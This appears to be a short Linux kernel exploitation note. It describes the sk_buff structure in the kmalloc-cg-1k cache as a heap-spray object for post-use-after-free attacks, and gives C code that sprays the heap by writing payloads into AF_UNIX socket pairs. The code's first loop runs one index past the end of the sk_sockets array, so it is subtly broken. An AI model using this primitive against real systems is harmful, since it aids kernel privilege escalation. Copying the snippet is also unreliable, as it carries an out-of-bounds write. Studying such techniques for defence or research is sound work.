* Info

- page: `kmalloc-cg-1k`
- heap leak: ?
- kbase leak: ?
- arb read: ?
- arb write: ?
- ROP: nil

Good for post-UAF exploitation, cos user data is at the start of the struct. Works well with `pipe_buf`!

* Interacting

@code c
// initialize queues
size_t socket_num = 0x4;
size_t skbuff_num = 128;
size_t sk_sockets[socket_num][2];
for (int i = 0; i <= socket_num; i++) {
  if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_sockets[i])) {
    perror("socketpair");
    return 1;
  }
}

// create sk_buffs
for (int i = 0; i < socket_num; i++) {
  for (int j = 0; j < skbuff_num; j++) {
    write(sk_sockets[i][0], payload, 1024 - 320);
  }
}
@end

TODO: closing
